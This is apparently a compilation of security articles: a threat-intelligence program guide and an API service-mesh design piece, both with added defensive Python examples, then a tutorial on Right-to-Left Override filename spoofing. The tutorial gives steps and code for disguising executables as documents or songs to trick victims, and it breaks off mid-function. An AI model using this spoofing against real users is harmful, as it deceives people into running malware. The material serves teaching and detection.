4. https://www.networkworld.com/category/advanced-persistent-threats/?start=20
5. https://interwork.com/wp-content/uploads/2016/12/sb01_dd_overview_140526us.pdf
6. https://www.helpnetsecurity.com/2012/03/01/trend-micro-unveils-apt-management-solution/

The Threat Intelligence EASY Button
Introduction
We have all seen it. Ineffective threat intelligence is happening across the globe. There are teams writing
resource intensive weekly products that many will not read. There are companies buying intelligence feeds that
will not be operationalized. There are intelligence teams that are not aligned to their stakeholders and there is
not a process to gather that feedback to make course corrections. This article is not an attempt to belittle the
efforts of budding intelligence teams. This article aspires to be a guide for those building, executing, or
consuming threat intelligence.
Chris Cochran is former active duty US Marine Intelligence. Chris has
dedicated his career to building advanced cybersecurity and
intelligence capabilities for national-level governments and the private
sector. He has led intelligence programs at the National Security
Agency, US Cyber Command, US House of Representatives, financial,
and high-tech sector companies. He currently leads the threat
intelligence and operations program at Netflix. Chris has made it his
personal mission to motivate and empower cybersecurity professionals
and teams through coaching, his podcast, and speaking engagements.
His concern for the ever-growing cyber skill gap serves as a motivator
for his need to inspire the next generation of cyber warriors to take the
helm.
Chris Cochran
The more I grow in my career, the more I look to give back to the professionals making their way through the
cybersecurity landscape. I found myself answering the same messages and questions about threat intelligence.
One day I thought to myself, “Wouldn’t it be great to have a threat intelligence EASY button that people could
press to help guide them through this process?” I have spent my career coaching intelligence analysts and
teams and 85% of that advice can be boiled down to four simple, but sometimes difficult, concepts that serve as a
touchstone for intelligence leaders and practitioners. These concepts are:
• Elicit Requirements
• Assess Collection Plan
• Strive for Impact
• Yield to Feedback
There you have it, the Intelligence EASY Button. These concepts are what I have always done and with a dab of
creativity, I was able to distill my philosophy into digestible nuggets.
Let's take some time to look at each of these individually.
Elicit Requirements
"It's not me, it's you." - Lily Allen
If you have been following my LinkedIn for a while or listen to my podcast, I have foot-stomped this concept on
many occasions. Threat intelligence teams, companies, experts are in the "service" business. We support
OTHER functions. While I do believe threat intelligence leads security, our work is not about us, it is about our
stakeholders. We need to know what information they require that will make their jobs more efficient, more
effective, or change what they are doing entirely. You will encounter some stakeholders that do not know what
information will aid those objectives. These are some of my favorite situations. You can have an "aha" moment
right there with your stakeholders. Ask questions. Ask good questions. Practice asking questions and refine
your stakeholder analysis. You will find, the more polished the requirements, the easier it is to support your
stakeholders.
You will want to do the best you can to get this right. Requirements are the foundation of an intelligence
program. I have been a part of teams where this was not done. We would project our own thoughts and biases
into our support of other teams without gathering the stakeholder’s thoughts or concerns. As you read this, I
am sure you see how big of a misstep this is. However, this is not likely an isolated incident. In fact, many of the
teams I have coached missed this crucial step. Luckily, this step is one of the easiest to fix. Open up the
calendar and schedule meetings with your stakeholders. During the meeting, be present and listen more than
you speak. Write down possible requirements and ask validation questions. You will then be on your way to
building an effective program.
Assess Collection Plan
"Everybody has plans, until they get hit." - Mike Tyson
If you are starting a threat intelligence program and you have a fleshed out collection plan before you did your
first stakeholder interview, I assess with HIGH confidence you will have to go back to the drawing board. Even
after you have done stakeholder analysis and there are new requirements that come up, you will have to look at
what information you are currently using for your analysis. Ask yourself, "Is this feed answering the questions
my stakeholders have?" Every feed is not for every team. A great source may not have the answers you are
looking for. Constantly reassess your collection plan and be aggressive in trimming away the non-essential.
When your requirements change, do some due diligence and make sure you can support given your current
collection posture.
Threat feeds are not silver bullets for intelligence. Threat feeds can be an incredible force-multiplier or a waste
of funds. Efforts must be made to ensure you are using the vendors and feeds you pay for. Look at efficient
ways to enrich your incident response using this data. Use your feed to reach quick determinations on the
reputation of indicators. Distill TTPs into digestible data points for your detection and threat hunting
capabilities. Optimize your resources and squeeze all of the functionality out of your feeds. Once you have
practice at this, it will be easier to do the same for other solutions.
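As an added example that is not part of the original article, here is what "operationalizing" a feed in the way just described can look like in Python: a constructed indicator feed is indexed, constructed proxy log lines are enriched with reputation and TTP context an incident responder can act on, and a per-source hit count shows which feed actually answered a question. The feed layout, log format, field names and confidence thresholds are assumptions.

```python
"""Added example: operationalizing a threat feed against proxy logs.

Not code from the article. The feed entries, log lines, field names and
confidence thresholds are constructed for illustration; indicators use
documentation address ranges and a placeholder hash.
"""
import re
from collections import Counter

# Constructed feed, as it might arrive from a vendor API or a STIX bundle.
FEED = [
    {"indicator": "198.51.100.23", "type": "ipv4", "confidence": 90,
     "source": "vendor-a", "ttp": "T1071.001 Application Layer Protocol: Web"},
    {"indicator": "updates.bad-cdn.example", "type": "domain", "confidence": 75,
     "source": "vendor-b", "ttp": "T1105 Ingress Tool Transfer"},
    {"indicator": "ab" * 32, "type": "sha256", "confidence": 60,
     "source": "osint-list", "ttp": "T1204.002 User Execution: Malicious File"},
    {"indicator": "203.0.113.99", "type": "ipv4", "confidence": 40,
     "source": "vendor-b", "ttp": "T1595 Active Scanning"},
]

# Constructed proxy log lines in key=value form.
SAMPLE_LOG = [
    "ts=2019-07-15T10:02:11Z src=10.0.5.17 dst=198.51.100.23 host=- method=POST url=/gate.php status=200 bytes=512",
    "ts=2019-07-15T10:03:40Z src=10.0.5.17 dst=203.0.113.5 host=updates.bad-cdn.example method=GET url=/pkg/agent.bin status=200 bytes=204800 sha256=" + "ab" * 32,
    "ts=2019-07-15T10:05:02Z src=10.0.7.2 dst=192.0.2.44 host=intranet.example.com method=GET url=/ status=200 bytes=1024",
]

# Which log fields can carry which indicator type.
FIELD_TYPES = {"dst": "ipv4", "host": "domain", "sha256": "sha256"}
KV = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one key=value log line into a dict."""
    return dict(KV.findall(line))


def build_index(feed):
    """Index the feed by (type, indicator) for constant-time reputation lookups."""
    return {(e["type"], e["indicator"].lower()): e for e in feed}


def verdict(confidence):
    """Map feed confidence to an action the IR team can take on."""
    if confidence >= 80:
        return "block-candidate"
    if confidence >= 50:
        return "investigate"
    return "context-only"


def enrich(events, index):
    """Return one hit record per (event, matching indicator) pair."""
    hits = []
    for ev in events:
        for field, itype in FIELD_TYPES.items():
            entry = index.get((itype, ev.get(field, "").lower()))
            if entry:
                hits.append({
                    "ts": ev["ts"], "src": ev["src"], "matched_on": field,
                    "indicator": entry["indicator"], "source": entry["source"],
                    "confidence": entry["confidence"], "ttp": entry["ttp"],
                    "verdict": verdict(entry["confidence"]),
                })
    return hits


def feed_effectiveness(hits):
    """Hits per source: evidence for keeping or trimming a feed."""
    return Counter(h["source"] for h in hits)


def hosts_to_triage(hits, min_confidence=50):
    """Internal hosts that touched at least one indicator above the threshold."""
    return {h["src"] for h in hits if h["confidence"] >= min_confidence}


if __name__ == "__main__":
    found = enrich([parse_event(l) for l in SAMPLE_LOG], build_index(FEED))
    for h in found:
        print(h["ts"], h["src"], h["matched_on"], h["indicator"], h["verdict"], h["ttp"])
    print("hits per source:", dict(feed_effectiveness(found)))
    print("hosts to triage:", hosts_to_triage(found))
```

The hit count per source is the number to bring to the next collection-plan review: a feed whose indicators never match anything in your own telemetry is not answering a stakeholder question, however good it looks on paper.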
Strive for Impact
“What you do has far greater impact than what you say.” - Stephen Covey
Let me paint a picture. You have spent the last two months working on a report you believe will change the
game at your company. You were diligent in your analysis. You included the best research from world-renowned
experts. You polished it up real nice with the help of a couple editors. You even had marketing take a stab at
making graphics for you. You deliver your masterpiece and... crickets. You wait a few days and ask, "Hey, what
was the reception of the report?" Your boss replies, "It was great work! Everyone loved it. The only problem is
they didn't understand the 'So what?'" Ouch... I have been there and I am sure many of you have been there
too. The beauty of threat intelligence or intelligence in general is it has the ability, and often goal, of inciting
change. The work I do can literally change the way my company operates, if I strive for impact in my
intelligence analysis and reporting. Take some time and think about what information is going to who, in what
context, and to support what decision, every time you hit send on that email.
Let me let you in on a little secret. In my current role, I am cheating. I am responsible for threat intelligence and
production, but I also lead threat operations AKA our purple team. There are many definitions of a purple team.
The way we look at it:
• Threat intelligence sets the threat context
• The red team emulates that threat in conjunction with risk priorities set by the organization
• The blue team, or threat hunters, are trying to find all of the malicious activity your security appliances are not,
including the red team
• Ultimately, you want to automate a successful hunt and add to your detections
This process is incredibly powerful. You iteratively close gaps in the organization's security posture. I know
what you must be thinking, “Chris, we do not have dedicated red teamers or threat hunters.” Neither do we at
my current role. We have implemented a reservist model that allows people to step into those roles periodically
so we can execute the mission without hiring dedicated teams. This reiterates the concept of optimizing what
you have access to, including people.
Yield to Feedback
“Feedback is the breakfast of champions.” - Ken Blanchard
Before I even begin talking about using feedback, I feel obligated to provide a tip about receiving feedback.
Please, make it easy for your stakeholder to present feedback. For instance, I built a simple Google form that I
can send pre-filled with context data to the stakeholder that can be filled in under a minute, if they so wish.
Subsequently, I produce a shareable link and personally message the stakeholder. I thank them for submitting
the request for information and ask them to fill out the form. I also mention it will take only moments of their
time. It is not my intent to boast, but under this construct I have a 100% return on my request for feedback.
Now once you have your feedback, use it! Even if you believe your stakeholder is misaligned in some way, that
still means the mark is being missed. Are your reports too long? Are they missing key details? Was your
intelligence not actionable? Was the delivery medium wrong? Did it take too long? These are just a few
examples of things that, while they can bruise the ego, can incrementally improve your intelligence reports and,
ultimately, your intelligence program.
There are two vital measurements I set as mandatory fields for feedback: relevance and impact. The great part
about this is that it ties back to the other tenets of the EASY button. Your relevance should be high if you are
answering the requirements set during the “Elicit Requirements” phase. These are the questions you need to
answer for your stakeholder and if you send something that isn’t relevant but you felt met the requirement, it is
time to readdress your requirements with your stakeholder. Impact is vital for “Strive for Impact.” Did the
information help the stakeholder DO or DECIDE something? If the intelligence did, you are on the right track. If
it didn’t, do a bit of analysis as to why. Maybe there was not enough context for the importance of the
information. Maybe the message was not clear. Use feedback as a gift to make the program better.
Conclusion
I hope this helps the producers and the consumers of intelligence. Used correctly, threat intelligence can
validate strategy bets for security, aid in the improvement of the security posture, and give impactful value to
stakeholders around the organization. I also hope this demystifies intelligence and highlights the need to be
proactive in security. In my philosophy, intelligence leads security. If you understand the threats your
organization faces and you have your organization’s context in mind, you can get ahead of the ever-changing
and never-ceasing threat.
Securing the API Economy
API led digital transformation and security
More and more financial services organizations (FSI) are making customer experience a part of key
performance indicators. This change leads to an increasing focus on delivering a more personalized service
rather than a cookie cutter approach led by the constant churn of new products.
Given the nature of their business, most FSI organizations have massive troves of data that can be tapped
using modern computing paradigms such as advanced data analytics, hyper cloud and artificial intelligence.
The insights learned can be used to provide a personalized seamless experience in a multi-channel
environment (e.g. mobile, web, connected devices, etc.).
Abhi Singh
Abhi is a Senior Manager at Deloitte's Cyber Risk practice. He
focuses on Cyber Security issues at large Financial Services
clients. He has over 17 years of information security
experience. His current focus areas include perimeterless
security architecture and leveraging blockchain for security use
cases. 
An application programming interface (API) based model is the most logical choice for this transformation. APIs
make it easier to integrate and connect people, places, systems, data, things, and algorithms, create new user
experiences, share data and information, authenticate people and things, enable transactions and algorithms,
leverage third-party algorithms, and create new products/services and business models.
However, with this rapidly scalable and interlinked environment, security often takes a back seat in comparison
to business agility. Our attempt in this paper is to describe a few security paradigms that can be included as a
part of the core API based architecture to allow for agility and scalability.
Understanding the core architecture
One of the foundational elements of the API based architecture is loose interlinkages between different
applications or parts within the application. This coupling provides extensibility, reliability, and scalability.
An application can be thought of as a Lego kit that is built from several individual pieces (microservices) [1]
serving a specific role and, when assembled in a definite manner (interfaces), form a defined structure.
Here is a typical architecture pattern for accessing a bank account:
Fig 1. Simplified microservices based financial application high level architecture
In this (simplified) example, the user can query their information, such as the bank balance, using an app developed by the bank, via a finance aggregator app developed by a third party, or via a normal web interface. In each case, the customer-facing microservice renders the correct UI based on the access channel and populates the data with the help of an aggregator service.
The aggregator service is expected to understand the data elements needed to satisfy the user query, and it connects to a data repository or a storage microservice to fulfill it.
Each of these microservices is independent of the others, and they interact using well defined interfaces[2]. This loose coupling brings many benefits, such as on-demand scaling of any microservice; for example, the UI microservice can scale up or down with the number of users accessing their accounts without impacting the others. Other advantages include predictable responses due to the well defined interface, lower computing overhead, faster time-to-market due to rapid releases, localized testing requirements, lower operational overhead, and effective resource utilization by focusing resources on individual microservices rather than the entire application, amongst many others.
This architecture is usually implemented using containers such as Docker[4]. To achieve the basic tenets -
automated application deployment, scaling, and management - these containers are managed using container
orchestration systems like k8s[4] and docker swarm[5].
Given our focus on securing the above architecture, we will not go into details of these orchestration systems.
However, the footnotes provide an authoritative background on most commonly used systems.
Key security issues in this container driven agile environment
Disregarding (for simplicity) the issues that manifest in a multi-cloud scenario, the traditional layered security defense does not work well in this case. Here are some reasons (not an exhaustive list):
• External facing APIs present a great misuse target[6] as they can expose application logic and potentially
sensitive data.
• Each microservice might have a small attack surface but the combined attack surface of the overall system is
hard to understand and defend.
• If each team can choose the language and frameworks for their microservice, it becomes extremely hard to
manage the security risks in a standardized manner.
• There is no choke point in the flow or network so logging, debugging, and access management becomes
tricky.
• There is an implicit trust on underlying hosts (or SaaS services in case of public cloud) to be secure and
provide segmentation based on risks posed by each container.
• In many cases these container hosts are dynamically created so enforcing the security measures to protect
the container runtime can be a challenge.
• Given the seamless flow of information between the containers, there is a strong possibility of lateral
movement if one of the containers is compromised. This issue can also lead to container/microservice
hopping following the predictable pattern of application flow[7].
• Monitoring is a challenge as the environment changes dynamically making it harder to correlate the data.
• Often microservices are made up of upstream proprietary and open source components. This can introduce
downstream vulnerabilities[8].
• Managing encryption keys or shared secrets leveraged by a container is a challenge because of the lack of
secure methods in deploying identifying keys in microservices. The encryption keys or secrets might also be
hard coded into container images.
• Integrating identity and access management can be an issue as there are multiple authentication and
authorization mechanisms present in a company and not all of them may be compatible with the container.
• As the application becomes fragmented and communication is purely API based, the developers have less
visibility into overall flow or business logic. This can lead to accidental exposure of information.
The (castle-wall based) tools currently available might not be fully capable of handling the new challenges
mentioned above. There aren’t many firewalls that observe east-west flows within the data center and
managing access control lists in a dynamically changing environment is almost impossible.
Integrating security in the life cycle
The common thread in the challenges mentioned above is a breach of trust using something that we inherently trust, such as a workload running in a container[9]. This is the same as what we have in a traditional data center-based infrastructure, like a breach using a server running on an internal network.
To create a fundamentally secure infrastructure, we probably should not place any inherent trust in the network, so that each system/container/pod becomes an island.
Fig 2. Breach is essentially localized
However, to achieve this architecture, the following key capabilities are required:
• Every flow on this network is known: applications have the capability to engage in TLS based sessions.
• Every flow is authenticated and authorized: access control lists, encryption keys, and credentials need to be managed between microservices, all while services are being added or changed.
• The network by itself implements least privilege without relying on developers for it.
Done by hand, this is a manageability and scalability headache.
One method to implement these capabilities is to use a “Service Mesh”[10]. The mesh determines how services discover each other (discovery) and talk to each other (routing). This was previously done using load balancers in front of each service. Most of these load balancers are manually managed, and if you were to add a new service, you would open a change ticket that would be serviced by IT. Load balancers therefore introduce a cost penalty and an agility penalty, depending on how fast an organization turns around the tickets, thereby defeating the overall purpose of rapidly scaling using microservices.
So, with a “Service Mesh”:
• All service-to-service communications happen via the service mesh (implemented as a software component, a proxy, placed adjacent to each microservice).
• There is a central registry that is dynamically managed as service instances come online and go offline, so new workloads can query this central registry to find the IP addresses of the services they want to connect to.
• There is native support for some network functions such as resiliency, service discovery, etc.
• Application developers can focus on the business logic while network and security functions are offloaded to the service mesh.
• Circuit breaking is available as a native feature.
• The capabilities are language agnostic.
• Security controls (encryption, authentication, authorization) can be implemented, managed, and scaled dynamically without modifying the application.
In order to enforce these security requirements and decisions, the proxy needs access to the workload (container) identity. These identities need to be created, rotated, and managed as the workloads change.
The second element is a repository of authorization policies maintained for each service. At a high level, the architecture would look similar to:
Fig 3. High level design for enforcing security using a service mesh architecture
A policy server can be used to define identities using digital certificates and has the keys to sign and validate
these identities. The agents manage the certificate lifecycle and distribution of the correct certificates to the
right proxies.
Fig 4. Service-Mesh based flow
Advantages of the service mesh based design
Authentication becomes seamless, automated, and scalable
• In this decoupled design, the application can continue to function if there is an outage in the control plane
• Agents are only needed when the proxy boots or when the identity expires
• Because agents manage the identities (keys) automatically, the lifetime can be pretty short (e.g. 12 hours)
• There is no need to maintain keys in the enforcement plane, thereby reducing the attack surface
• Policy agents issue the identities to the service proxies, which in turn can use these identities to perform
communication over TLS using mutual authentication. The application does not need any changes in this
case
Authorization can be enforced to minimize the attack surface
• The engine contains fine grained application level policies that can describe the type of requests (e.g. GET,
service accounts that are allowed access) accepted at the service (workload) level. So even though the proxy
has the required identity, the request can still be deemed unauthorized if it’s not explicitly allowed in policy
server and enforced using enforcement agents. Depending on the capability of the proxy to understand the
details of protocols, you can enforce different match criteria
• The enforcement agent is only needed when the policy changes, otherwise, it is decoupled from the proxy
• When the proxy gets the access request it performs the following steps:
Authenticates the request
Captures the details of the access requested
Matches the request against the authorization policy as dictated by the enforcement agent
Allows or denies the request
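As an added example that is not part of the original article, the four steps above modelled in Python for a sidecar proxy: the peer identity is a SPIFFE-style URI with the short expiry set by the policy agent, and the policy table stands in for what the enforcement agent pushes to the proxy. The trust domain, service names, paths and rules are assumptions, and the mTLS handshake is assumed to have already verified the client certificate and produced the peer identity.

```python
"""Added example: the authorization decision a service-mesh sidecar makes.

Not code from the article. The TLS handshake is assumed to have already
verified the client certificate; what arrives here is the identity it
carried. Trust domain, service names, paths and rules are assumptions.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional

TRUST_DOMAIN = "spiffe://bank.example"
# Fixed reference clock so the demo is reproducible.
CLOCK = datetime(2019, 7, 15, 12, 0, tzinfo=timezone.utc)


@dataclass(frozen=True)
class Identity:
    spiffe_id: str       # e.g. spiffe://bank.example/ns/prod/sa/ui
    not_after: datetime  # short lifetime (hours) set by the policy agent


@dataclass(frozen=True)
class Rule:
    source: str           # caller identity allowed by this rule
    methods: frozenset    # HTTP methods the caller may use
    path_prefix: str      # request paths the rule covers


@dataclass(frozen=True)
class Request:
    peer: Optional[Identity]  # None when the client presented no certificate
    method: str
    path: str


# What the enforcement agent pushed to each workload's proxy (assumption):
# the UI may only read accounts via the aggregator, and only the aggregator
# may reach storage. Anything not listed is denied.
POLICY = {
    "spiffe://bank.example/ns/prod/sa/aggregator": [
        Rule("spiffe://bank.example/ns/prod/sa/ui", frozenset({"GET"}), "/accounts/"),
    ],
    "spiffe://bank.example/ns/prod/sa/storage": [
        Rule("spiffe://bank.example/ns/prod/sa/aggregator", frozenset({"GET", "POST"}), "/records/"),
    ],
}


def issue(spiffe_id, now, ttl_hours=12):
    """What the policy agent does at proxy boot or when the identity expires."""
    return Identity(spiffe_id, now + timedelta(hours=ttl_hours))


def authenticate(req, now):
    """Step 1: the peer must hold an unexpired identity from our trust domain."""
    if req.peer is None:
        return False, "no client certificate"
    if not req.peer.spiffe_id.startswith(TRUST_DOMAIN + "/"):
        return False, "identity from foreign trust domain"
    if now >= req.peer.not_after:
        return False, "identity expired"
    return True, "authenticated"


def capture(req):
    """Step 2: the request attributes the policy is written in terms of."""
    return {"source": req.peer.spiffe_id, "method": req.method.upper(), "path": req.path}


def rule_matches(rule, attrs):
    """Step 3: one rule against one request."""
    return (attrs["source"] == rule.source
            and attrs["method"] in rule.methods
            and attrs["path"].startswith(rule.path_prefix))


def authorize(workload, req, now, policy=POLICY):
    """Steps 1 to 4 for a request arriving at `workload`'s proxy.

    Returns (decision, reason). A valid identity alone is not enough: the
    request must also match an explicit rule, otherwise it is denied.
    """
    ok, reason = authenticate(req, now)
    if not ok:
        return "deny", reason
    attrs = capture(req)
    for rule in policy.get(workload, []):
        if rule_matches(rule, attrs):
            return "allow", "matched rule for " + rule.source
    return "deny", "no rule allows {method} {path} from {source}".format(**attrs)


if __name__ == "__main__":
    ui = issue("spiffe://bank.example/ns/prod/sa/ui", CLOCK)
    agg = "spiffe://bank.example/ns/prod/sa/aggregator"
    print(authorize(agg, Request(ui, "GET", "/accounts/42/balance"), CLOCK))
    print(authorize(agg, Request(ui, "POST", "/accounts/42/transfer"), CLOCK))
    # The UI holds a valid identity but still cannot hop straight to storage.
    print(authorize("spiffe://bank.example/ns/prod/sa/storage",
                    Request(ui, "GET", "/records/42"), CLOCK))
```

The last call is the point of the design with respect to lateral movement: a compromised UI container carries a perfectly valid identity, yet the storage proxy denies it because no rule names the UI as a permitted caller.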
Other benefits
• Proxy can be used to collect and forward logs to a central (SIEM type) service. It can also integrate with other
messaging systems[11].
• As proxy intercepts all the traffic close to workload, it is possible to identify accidental or intended data leaks.
• Compliance requirements of each type of workload can be defined in the policy server based on the data
type, location, etc. Agents can calculate the proxy specific compliance requirements. The proxies can be
used to enforce it on a request by request basis.
Beyond infrastructure - Further reducing the attack surface
The above approach will reduce the attack surface exposed due to infrastructure elements. However, the APIs
themselves may provide a viable breach target (though the impact might be localized and limited).
Below are some strategies to mitigate the attack surface exposed by APIs[12].
1. Making security an integral part of the continuous delivery pipeline: At a high level, the flow along with the security components looks like the figure below. Note that this is just a representation; check the footnotes for more definitive sources in this area[13].
Fig 5. Security in CI/CD pipeline
2. Focusing on compliance as a product: The DevOps Audit Defense Toolkit[14] summarizes the techniques that can be used to demonstrate to auditors that the company understands the business risks and is properly mitigating them. The compliance requirements are automated in the CI/CD pipeline tools. Change management is also automated, and every change in the code is tied back to an approved ticket. This enforces traceability and auditability.
3. Security of infrastructure code: The practices mentioned in DevOps Audit Defense Toolkit are applicable in
this area as well. Configuration management and automation tools like Ansible, Chef, Puppet can be used to
support the automated testing. Peer reviews are conducted before commits. All changes are logged and
analyzed.
Leveraging provable security methods
Provable security[15] (or model based validation) in our context means using formal methods to test and demonstrate the security of the design. We start with threat modeling (albeit without considering side channel attacks) and determine the coverage provided by the controls as each attack unfolds.
The design described above is based on two high level sets of policies:
Identification / authentication / access control lists, and;
Authorization
The objective is to develop an automated system that validates the security of the design by comparing it against defined benchmarks (a set of fundamental rules defined for the particular environment). For example, a benchmark can state that production systems may only be accessed via a jump host, or that the set of user ids with access to a system changes with the time of day (such as an on-call roster).
As in traditional design, we can use threat modeling[16] to determine the potential vulnerabilities (and, ideally, the associated attack trees). Once we understand these vulnerabilities, we can determine the corresponding rules that can be enforced using the policies defined on the Policy Server.
These policies describe the expected state (benchmark policies) of the environment, to be enforced by agents through proxies.
During day-to-day operations, system admins, application owners and others will define new policies. Before a new policy can be implemented, it can be compared automatically (as part of the CI/CD pipeline) with the pre-defined benchmarks. The flow might look like:
Fig 6. Embedding provable security in CI/CD flow
The advantage of this process is that it is completely transparent to developers and infrastructure engineers. When a change to the existing environment is pushed (for example, a new app version that requires modifications to the existing access or authorization policies), the change is automatically routed to the analysis engine. The engine compares it against the benchmarks and highlights the policy areas that violate the required security thresholds.
As the analysis is done at the policy element level, the output/remediation also names the exact elements that need to be modified to meet the required criteria.
In addition, the CI/CD pipeline can be configured to check the policy changes against the baseline before filing a change ticket.
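As an added illustration of the analysis engine described above (this is example code written for this edition, not the article's own implementation), the following Python script checks a proposed set of access-policy elements against benchmark rules of the kind mentioned: production targets reachable only via a jump host, production access windows bounded by the on-call roster, and no wildcards. The policy schema, benchmark names, roster and sample rules are assumptions; each finding names the exact policy element and field that has to change, which is what lets the pipeline hand back a precise remediation.

```python
"""Added example for the analysis engine described above (not code from the article):
proposed access-policy elements are checked against benchmark rules before the Policy
Server accepts them, and each finding names the exact element and field to fix.
The policy schema, the benchmark names and the sample rules are assumptions."""
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Tuple


@dataclass
class AccessRule:
    """One policy element as an app owner might submit it in a CI/CD change (assumed schema)."""
    rule_id: str
    subject: str              # user id or service account
    target: str               # host or service name
    environment: str          # "prod" or "nonprod"
    via: str                  # entry point: "jump-host" or "direct"
    hours: Tuple[int, int]    # allowed window [start, end) on a 24h clock
    actions: List[str] = field(default_factory=list)


Violation = Tuple[str, str, str]             # (rule_id, field, reason)
Benchmark = Callable[[AccessRule], List[Violation]]


def bench_prod_via_jump_host(r: AccessRule) -> List[Violation]:
    """Benchmark: production systems are only reachable through the jump host."""
    if r.environment == "prod" and r.via != "jump-host":
        return [(r.rule_id, "via", "production targets must be reached via the jump host")]
    return []


def bench_prod_access_window(on_call: Dict[str, Tuple[int, int]]) -> Benchmark:
    """Benchmark factory: in prod, a subject's access window must fit its on-call roster slot."""
    def check(r: AccessRule) -> List[Violation]:
        if r.environment != "prod":
            return []
        slot = on_call.get(r.subject)
        if slot is None:
            return [(r.rule_id, "subject", f"{r.subject} is not on the on-call roster")]
        start, end = r.hours
        if start < slot[0] or end > slot[1]:
            return [(r.rule_id, "hours", f"window {r.hours} exceeds roster slot {slot}")]
        return []
    return check


def bench_no_wildcards(r: AccessRule) -> List[Violation]:
    """Benchmark: no wildcard subjects or actions in any environment."""
    out = []
    if r.subject == "*":
        out.append((r.rule_id, "subject", "wildcard subject is not allowed"))
    if "*" in r.actions:
        out.append((r.rule_id, "actions", "wildcard action is not allowed"))
    return out


def analyze(policies: List[AccessRule], benchmarks: List[Benchmark]) -> List[Violation]:
    """Run every benchmark over every policy element; the result is the remediation list."""
    return [v for r in policies for b in benchmarks for v in b(r)]


def gate(policies: List[AccessRule], benchmarks: List[Benchmark]) -> bool:
    """Pipeline gate: the change set passes only if no benchmark is violated."""
    return not analyze(policies, benchmarks)


# Constructed on-call roster and benchmark set for this environment.
ON_CALL = {"alice": (0, 24), "bob": (9, 18)}
BENCHMARKS: List[Benchmark] = [bench_prod_via_jump_host,
                               bench_prod_access_window(ON_CALL),
                               bench_no_wildcards]

# Constructed change set: r1 is compliant, r2 and r3 break benchmarks.
PROPOSED = [
    AccessRule("r1", "alice", "orders-api", "prod", "jump-host", (0, 24), ["deploy"]),
    AccessRule("r2", "bob", "orders-db", "prod", "direct", (8, 20), ["read"]),
    AccessRule("r3", "*", "orders-api", "nonprod", "direct", (0, 24), ["*"]),
]

if __name__ == "__main__":
    for rule_id, fld, reason in analyze(PROPOSED, BENCHMARKS):
        print(f"VIOLATION {rule_id}.{fld}: {reason}")
    print("gate:", "PASS" if gate(PROPOSED, BENCHMARKS) else "FAIL")
```

In a real pipeline the benchmarks would be loaded from a versioned file owned by the security team rather than defined next to the policies, so that an app owner's change cannot also relax the rules it is checked against.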
References:
[1] https://doi.ieeecomputersociety.org/10.1109/MS.2018.2141039
[2] https://en.wikipedia.org/wiki/Application_programming_interface
[3] https://en.wikipedia.org/wiki/Docker_(software)
[4] https://github.com/kubernetes/kubernetes
[5] https://docs.docker.com/engine/swarm/
[6] https://www.owasp.org/index.php/OWASP_API_Security_Project
[7] https://dl.acm.org/citation.cfm?id=3274720
[8] https://github.com/devsecops/devsecops
[9] https://ai.google/research/pubs/pub43231
[10] https://www.nginx.com/blog/what-is-a-service-mesh/
[11] https://kafka.apache.org/
[12] https://www.owasp.org/index.php/OWASP_API_Security_Project
[13] https://www.devsecops.org/, https://www.devsecopsdays.com/
[14] https://itrevolution.com/devops-audit-defense-toolkit/
[15] https://en.wikipedia.org/wiki/Provable_security
[16] https://insights.sei.cmu.edu/sei_blog/2018/12/threat-modeling-12-available-methods.html
Right to Left Override (RTLO) Technique
What is RTLO?
RTLO stands for Right-to-Left Override. It is a Unicode control character, U+202E, intended for bidirectional text such as Arabic or Hebrew: it tells the renderer to display everything that follows it in right-to-left order, so the characters after it appear reversed.
RTLO has been used in phishing attacks for many years. Attackers insert the RTLO character into the filenames of attachments to trick users into thinking the attachment is safe.
For example, a file whose real name is "malware[U+202E]gpj.exe" (the override placed between "malware" and "gpj.exe") is displayed as "malwareexe.jpg", although it is an executable.
Pal Patel
Pal Patel is a Security Researcher, Penetration Tester and Bug Bounty Hunter with over 3 years of experience. Pal has been rewarded by more than 250 companies for finding loopholes in their systems.
The RTLO character can be found from Character Map:
How do you trick a victim using the RTLO technique?
This trick is typically used in chat functionality when talking to a victim.
For example:
"Hey check out my new song at example.com/song[rtlo]3pm.exe."
Replace the "[rtlo]" placeholder in the URL with the actual RTLO symbol copied from the Character Map and send the URL to the victim. When the victim receives it, it looks like:
"Hey check out my new song at example.com/songexe.mp3."
Seeing "mp3", the victim assumes it is a song and clicks the link. Once the link is opened, the browser percent-encodes the override character and the real URL becomes visible:
http://example.com/song%E2%80%AE%E2%80%AE%E2%80%AE%E2%80%AE%E2%80%AE%E2%80%AE3pm.exe
The victim can be tricked in the same way, and other social engineering techniques are combined with RTLO. Twitter, Skype, Snapchat, etc. have protection against the RTLO technique in their chat functionality.
This technique is fairly old, but it is still used for delivering malware, backdoors, etc.
Let's take another example:
• There is a malicious file named doc.exe
• Copy the RTLO character from the Character Map
• Write the extension you want the victim to see in reverse: for "doc" write "cod", for "pdf" write "fdp"
• Paste the RTLO symbol in front of the reversed extension; the real name of the file is now "doc[RTLO]fdp.exe"
• The file is displayed as docexe.pdf, so the victim is tricked by the apparent extension
• It is a good idea to also change the icon of the malicious file and to use a plausible name, for example a malicious file disguised as a Microsoft Word document, so that the displayed name and icon agree and the real extension stays hidden
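The following Python script is an added example for this edition, not code from the article: it builds a spoofed name the way the steps above describe, shows what the name looks like once rendered, and, for the defensive side, flags bidi control characters in a filename or URL path and reports the extension the operating system will really act on. The rendering function is a deliberate simplification of the Unicode bidirectional algorithm (it reverses everything after the override), which is enough to reproduce the examples in this article; the function and constant names are mine.

```python
"""Added example (not code from the article): build an RTLO-spoofed name, show how it is
displayed, and detect the trick in filenames or URLs. displayed_name() is a deliberate
simplification of the Unicode bidi algorithm: it reverses everything after the override,
which is enough to reproduce the article's examples. The function and constant names are mine."""
import unicodedata
from urllib.parse import quote

RLO = "\u202e"
# Unicode bidi control characters: none of them belongs in a legitimate filename.
BIDI_CONTROLS = frozenset("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")


def spoofed_name(prefix: str, shown_ext: str, real_ext: str) -> str:
    """Stored name: prefix + RLO + reversed shown extension + '.' + real extension.
    spoofed_name('doc', 'pdf', 'exe') -> 'doc\\u202efdp.exe', which displays as 'docexe.pdf'."""
    return f"{prefix}{RLO}{shown_ext[::-1]}.{real_ext}"


def displayed_name(name: str) -> str:
    """What a bidi-aware renderer shows (simplified: the run after U+202E is reversed)."""
    if RLO not in name:
        return name
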